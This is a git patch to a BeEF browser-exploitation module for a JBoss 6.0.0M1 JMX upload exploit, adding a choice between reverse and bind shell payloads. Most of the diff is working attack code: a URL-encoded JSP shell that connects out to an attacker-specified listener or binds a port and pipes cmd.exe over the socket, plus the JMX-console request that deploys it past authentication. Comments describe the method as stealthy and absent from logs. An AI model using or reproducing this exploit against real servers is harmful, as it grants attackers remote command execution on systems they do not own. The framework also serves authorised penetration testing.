From 1dcac350f2b57f906903b5d17c77bc3f87bdb7c7 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Mon, 30 May 2011 10:04:33 +0000 Subject: [PATCH] Fixes issue 337 : added dropdown to let the user choose a reverse or bind payload. Modified JSP payload accordingly. git-svn-id: https://beef.googlecode.com/svn/trunk@990 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- .../jboss_jmx_upload_exploit/command.js | 26 +++++++++++++++---- .../jboss_jmx_upload_exploit/config.yaml | 2 +- .../jboss_jmx_upload_exploit/module.rb | 10 ++++--- 3 files changed, 29 insertions(+), 9 deletions(-) diff --git a/modules/network/jboss_jmx_upload_exploit/command.js b/modules/network/jboss_jmx_upload_exploit/command.js index c09e15b89..43117b3f1 100644 --- a/modules/network/jboss_jmx_upload_exploit/command.js +++ b/modules/network/jboss_jmx_upload_exploit/command.js @@ -1,9 +1,10 @@ /** * Jboss 6.0.0M1 JMX Upload Exploit * Ported from l33tb0y Ruby code in Javascript by antisnatchor. - * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler + * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler OR shell binding to high port * - * This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell + * This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell. + * This is the stealthiest approach: nothing is shown on the logs */ beef.execute(function() { @@ -13,9 +14,20 @@ beef.execute(function() { lport = "<%= @lport %>"; injectedCommand = "<%= @injectedCommand %>"; jspName = "<%= @jspName %>"; + payloadType = "<%= @payload %>"; - payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20%25%3E"; - uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True"; + reverse = "try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20"; + bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20"; + + if(payloadType == "reverse"){ + console.log("Using REVERSE payload [" + reverse + "]"); + payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + reverse + "%25%3E"; + }else{ + console.log("Using BIND payload [" + bind + "]"); + payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + bind + "%25%3E"; + } + + uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True"; /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/ beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){ @@ -23,7 +35,11 @@ beef.execute(function() { function triggerReverseConn(){ beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){ if(response.status_code == "success"){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); + if(payloadType == "reverse"){ + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); + }else{ + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Bind JSP shell should have been triggered. Try to connect to "+rhost+":"+lport+"."); + } }else{ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed."); } diff --git a/modules/network/jboss_jmx_upload_exploit/config.yaml b/modules/network/jboss_jmx_upload_exploit/config.yaml index 430bd9e5c..7b51046fa 100644 --- a/modules/network/jboss_jmx_upload_exploit/config.yaml +++ b/modules/network/jboss_jmx_upload_exploit/config.yaml @@ -4,7 +4,7 @@ beef: enable: true category: "Network" name: "Jboss 6.0.0M1 JMX Deploy Exploit" - description: "Deploy a JSP reverse shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload." + description: "Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload." authors: ["antisnatchor", "l33tb0y"] target: working: ["ALL"] diff --git a/modules/network/jboss_jmx_upload_exploit/module.rb b/modules/network/jboss_jmx_upload_exploit/module.rb index f311cfc27..b99470937 100644 --- a/modules/network/jboss_jmx_upload_exploit/module.rb +++ b/modules/network/jboss_jmx_upload_exploit/module.rb @@ -6,16 +6,20 @@ class Jboss_jmx_upload_exploit < BeEF::Core::Command def initialize super({ 'Name' => 'Jboss 6.0.0M1 JMX Deploy Exploit', - 'Description' => 'Deploy a JSP reverse shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload.', + 'Description' => 'Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload.', 'Category' => 'Network', 'Author' => 'antisnatchor, l33tb0y', 'Data' => [ {'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'}, {'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'}, {'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'}, - {'name' => 'lport', 'ui_label' => 'MSF Listener Port', 'value' => '6666'}, + {'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'}, {'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'}, - {'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)} + {'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)}, + { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', + 'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']], + 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true + } ], 'File' => __FILE__ })